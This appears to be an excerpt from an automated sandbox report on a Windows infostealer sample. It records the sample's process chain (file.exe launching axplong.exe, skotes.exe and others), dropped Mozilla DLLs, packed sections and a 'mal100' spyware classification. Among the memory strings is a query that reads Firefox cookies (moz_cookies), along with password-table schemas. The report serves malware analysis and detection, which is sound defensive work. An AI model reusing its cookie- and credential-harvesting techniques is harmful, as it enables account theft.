Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C37E070 8_2_6C37E070
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3400B0 8_2_6C3400B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C328090 8_2_6C328090
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C40C0B0 8_2_6C40C0B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3A6130 8_2_6C3A6130
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C414130 8_2_6C414130
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C398140 8_2_6C398140
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3301E0 8_2_6C3301E0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3FA210 8_2_6C3FA210
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3B8260 8_2_6C3B8260
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C408220 8_2_6C408220
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3C8250 8_2_6C3C8250
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C4B62C0 8_2_6C4B62C0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3FE2B0 8_2_6C3FE2B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C4022A0 8_2_6C4022A0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3A2320 8_2_6C3A2320
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C44C360 8_2_6C44C360
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C472370 8_2_6C472370
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C332370 8_2_6C332370
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3C6370 8_2_6C3C6370
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C338340 8_2_6C338340
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C38E3B0 8_2_6C38E3B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3623A0 8_2_6C3623A0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3843E0 8_2_6C3843E0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C341C30 8_2_6C341C30
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C459C40 8_2_6C459C40
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: String function: 6C2BCBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: String function: 6C2C94D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: String function: 6C353620 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: String function: 6C359B10 appears 53 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9973390667574932
Source: file.exe Static PE information: Section: zenyeedi ZLIB complexity 0.9945590287981193
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9973390667574932
Source: axplong.exe.0.dr Static PE information: Section: zenyeedi ZLIB complexity 0.9945590287981193
Source: random[1].exe.7.dr Static PE information: Section: izqgivfx ZLIB complexity 0.9947300404170571
Source: 4065fbc12b.exe.7.dr Static PE information: Section: izqgivfx ZLIB complexity 0.9947300404170571
Source: random[1].exe0.7.dr Static PE information: Section: ZLIB complexity 0.9981373467302452
Source: random[1].exe0.7.dr Static PE information: Section: ncirbphu ZLIB complexity 0.9946759993654822
Source: 4d1c7345ec.exe.7.dr Static PE information: Section: ZLIB complexity 0.9981373467302452
Source: 4d1c7345ec.exe.7.dr Static PE information: Section: ncirbphu ZLIB complexity 0.9946759993654822
Source: skotes.exe.9.dr Static PE information: Section: ZLIB complexity 0.9981373467302452
Source: skotes.exe.9.dr Static PE information: Section: ncirbphu ZLIB complexity 0.9946759993654822
Source: 951fa0b99a.exe.17.dr Static PE information: Section: izqgivfx ZLIB complexity 0.9947300404170571
Source: random[1].exe0.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 4d1c7345ec.exe.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.9.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@21/33@0/4
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 8_2_6C2E7030
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.8.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.8.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.8.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.8.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.8.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.8.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.8.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 4065fbc12b.exe, 0000000C.00000002.2975327681.000000000155B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: 4065fbc12b.exe, 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.8.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 4065fbc12b.exe, 00000008.00000003.2800413158.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000003.2819388666.000000001D9FB000.00000004.00000020.00020000.00000000.sdmp, GCAEHDBAAECBFHJKFCFB.8.dr, BGDAAKJJDAAKFHJKJKFC.8.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.8.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 4065fbc12b.exe, 00000008.00000002.3004862115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2985069780.000000001DB0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.8.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 4065fbc12b.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe "C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe "C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe"
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe "C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe "C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe"
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe "C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe "C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe"
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe "C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe "C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wldp.dll Jump to behavior
